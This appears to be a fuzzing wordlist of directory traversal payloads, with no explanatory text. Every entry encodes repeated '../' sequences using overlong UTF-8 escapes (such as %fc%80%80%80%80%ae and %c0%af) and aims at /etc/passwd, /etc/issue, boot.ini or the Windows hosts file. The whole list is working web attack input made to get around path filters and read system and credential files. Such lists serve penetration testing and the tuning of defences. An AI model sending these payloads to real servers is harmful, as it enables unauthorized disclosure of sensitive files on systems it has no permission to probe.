-%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afetc%c0%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cetc%c0%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cetc%c1%9cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcpasswd 